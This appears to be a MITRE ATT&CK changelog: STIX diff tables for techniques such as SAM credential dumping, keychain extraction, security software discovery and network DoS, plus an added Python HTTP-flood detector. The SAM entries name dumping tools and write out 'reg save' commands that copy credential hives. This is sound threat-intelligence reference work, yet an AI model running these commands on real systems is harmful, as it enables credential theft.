| external_references[1]['description'] | Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017. | ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Screensaver | https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf |
| external_references[2]['source_name'] | ESET Gazer Aug 2017 | Wikipedia Screensaver |
| external_references[2]['description'] | ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. | Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017. |
| external_references[2]['url'] | https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf | https://en.wikipedia.org/wiki/Screensaver |
| x_mitre_data_sources[0] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | File: File Modification |
| x_mitre_data_sources[2] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[3] | File: File Creation | Command: Command Execution |
| x_mitre_data_sources[4] | File: File Modification | Process: Process Creation |
| Description |
|---|
| Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan) Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:50:44.308000+00:00 | 2022-10-18 22:45:19.607000+00:00 |
| external_references[1]['source_name'] | WHOIS | Circl Passive DNS |
| external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. |
| external_references[1]['url'] | https://www.whois.net/ | https://www.circl.lu/services/passive-dns/ |
| external_references[3]['source_name'] | Circl Passive DNS | Medium SSL Cert |
| external_references[3]['description'] | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. | Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020. |
| external_references[3]['url'] | https://www.circl.lu/services/passive-dns/ | https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2 |
| external_references[4]['source_name'] | Medium SSL Cert | WHOIS |
| external_references[4]['description'] | Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. |
| external_references[4]['url'] | https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2 | https://www.whois.net/ |
| external_references[5]['source_name'] | SSLShopper Lookup | Shodan |
| external_references[5]['description'] | SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020. | Shodan. (n.d.). Shodan. Retrieved October 20, 2020. |
| external_references[5]['url'] | https://www.sslshopper.com/ssl-checker.html | https://shodan.io |
| external_references[6]['source_name'] | DigitalShadows CDN | SSLShopper Lookup |
| external_references[6]['description'] | Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020. | SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020. |
| external_references[6]['url'] | https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/ | https://www.sslshopper.com/ssl-checker.html |
| external_references[7]['source_name'] | Shodan | DigitalShadows CDN |
| external_references[7]['description'] | Shodan. (n.d.). Shodan. Retrieved October 20, 2020. | Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020. |
| external_references[7]['url'] | https://shodan.io | https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/ |
| Description |
|---|
| Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, news sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)). |
New Mitigations:
Dropped Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:52:41.104000+00:00 | 2022-10-18 22:48:33.286000+00:00 |
| external_references[1]['source_name'] | Cyware Social Media | SecurityTrails Google Hacking |
| external_references[1]['description'] | Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020. | Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020. |
| external_references[1]['url'] | https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e | https://securitytrails.com/blog/google-hacking-techniques |
| external_references[2]['source_name'] | SecurityTrails Google Hacking | Cyware Social Media |
| external_references[2]['description'] | Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020. | Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://securitytrails.com/blog/google-hacking-techniques | https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\sam sam * reg save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+. |
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* reg save HKLM\sam sam
* reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['SYSTEM'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 15:17:30.640000+00:00 | 2022-06-15 16:17:19.049000+00:00 |
| description | Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* reg save HKLM\sam sam
* reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+. |
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* reg save HKLM\sam sam
* reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| Old Description | New Description |
|---|---|
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) |
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the DescribeSecurityGroups action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Isif Ibrahima, Mandiant'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-581 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:05:00.198000+00:00 | 2022-04-11 22:26:34.327000+00:00 |
| description | Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) |
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the DescribeSecurityGroups action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud) |
| external_references[1]['source_name'] | capec | Expel IO Evil in AWS |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/581.html | https://expel.io/blog/finding-evil-in-aws/ |
| external_references[2]['source_name'] | Expel IO Evil in AWS | DescribeSecurityGroups - Amazon Elastic Compute Cloud |
| external_references[2]['description'] | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. | Amazon Web Services, Inc. (2022). DescribeSecurityGroups. Retrieved January 28, 2022. |
| external_references[2]['url'] | https://expel.io/blog/finding-evil-in-aws/ | https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html |
| x_mitre_data_sources[0] | Firewall: Firewall Metadata | Process: OS API Execution |
| x_mitre_data_sources[1] | Firewall: Firewall Enumeration | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Firewall: Firewall Enumeration |
| x_mitre_data_sources[4] | Process: OS API Execution | Firewall: Firewall Metadata |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/581.html', 'external_id': 'CAPEC-581'} | |
| Old Description | New Description |
|---|---|
| An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain) | An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. 
Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-17 13:16:53.850000+00:00 | 2022-03-08 21:43:20.609000+00:00 |
| description | An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain) | An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. 
Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain) |
| x_mitre_data_sources[0] | Command: Command Execution | Process: Process Access |
| x_mitre_data_sources[1] | Process: Process Access | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications. | Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 17:05:44.743000+00:00 | 2022-10-19 21:18:29.349000+00:00 |
| description | Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications. | Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW) |
| external_references[1]['source_name'] | US-CERT Alert TA15-314A Web Shells | volexity_0day_sophos_FW |
| external_references[1]['description'] | US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. | Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022. |
| external_references[1]['url'] | https://www.us-cert.gov/ncas/alerts/TA15-314A | https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ |
| x_mitre_data_sources[0] | File: File Creation | Process: Process Creation |
| x_mitre_data_sources[1] | File: File Modification | Application Log: Application Log Content |
| x_mitre_data_sources[2] | Process: Process Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | File: File Modification |
| x_mitre_data_sources[5] | Application Log: Application Log Content | File: File Creation |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT Alert TA15-314A Web Shells', 'description': 'US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA15-314A'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012) | Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. 
One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012) |
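The HTTP-flood variant described above leaves a signature in ordinary web server access logs (the Application Log and Network Traffic Flow data sources listed for this technique): one source exceeding any sane request rate against one endpoint. The Python below is an added detection example, not code from ATT&CK or from any cited report; the log lines are constructed, and the window length and per-source budget are illustrative tuning assumptions rather than recommended values.

```python
# Added example (not from the ATT&CK entry): flag HTTP-flood candidates in
# Apache/nginx "combined" access logs with a per-source sliding window.
# Sample log lines are constructed; WINDOW_SECONDS / REQ_PER_WINDOW are assumptions.
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
import re

# Only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

WINDOW_SECONDS = 10   # sliding window length (assumed tuning value)
REQ_PER_WINDOW = 50   # per-source request budget inside one window (assumed tuning value)


def parse_line(line):
    """Parse one access-log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_http_flood(lines, window=WINDOW_SECONDS, budget=REQ_PER_WINDOW):
    """Flag sources that issue more than `budget` requests inside any `window` seconds.

    Lines are expected in chronological order per source. Returns
    {ip: {"peak": most requests seen in one window, "first_alert": datetime,
          "paths": {path: hits made while over budget}}}.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and (rec["ts"] - q[0]).total_seconds() > window:
            q.popleft()                      # expire timestamps that left the window
        if len(q) > budget:
            a = alerts.setdefault(rec["ip"], {"peak": 0, "first_alert": rec["ts"],
                                              "paths": defaultdict(int)})
            a["peak"] = max(a["peak"], len(q))
            a["paths"][rec["path"]] += 1     # which endpoint is being hammered
    return alerts


def _fmt(t):
    return t.strftime("%d/%b/%Y:%H:%M:%S %z")


def constructed_sample():
    """Constructed log lines: one source firing 120 requests in six seconds at a
    search endpoint, and one ordinary client making ten requests over 100 seconds."""
    base = datetime(2022, 6, 15, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(120):
        t = base + timedelta(milliseconds=50 * i)
        lines.append(f'203.0.113.7 - - [{_fmt(t)}] "GET /search?q=x HTTP/1.1" 200 512')
    for i in range(10):
        t = base + timedelta(seconds=10 * i)
        lines.append(f'198.51.100.20 - - [{_fmt(t)}] "GET /index.html HTTP/1.1" 200 1024')
    return lines


if __name__ == "__main__":
    for ip, a in detect_http_flood(constructed_sample()).items():
        print(ip, "peak", a["peak"], "first alert", a["first_alert"].isoformat(), dict(a["paths"]))
```

Per-source counting is deliberately simple; in production the same window logic is usually keyed on a client fingerprint (source address plus User-Agent or TLS fingerprint) because a distributed flood spreads the budget across many addresses. The SSL/TLS renegotiation variant does not show up in access logs at all: each renegotiation happens inside one established connection, so it is checked on the TLS side instead, by confirming that client-initiated renegotiation is disabled in the server configuration and by watching handshake counts per connection.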
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| external_references | Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019. | |
| external_references | CAPEC-488 | |
| external_references | CAPEC-489 | |
| external_references | CAPEC-528 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-488 | |
| external_references | CAPEC-489 | |
| external_references | CAPEC-528 | |
| external_references | Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019. | |
| external_references | ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:11:12.815000+00:00 | 2022-04-19 23:20:50.470000+00:00 |
| description | Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012) | 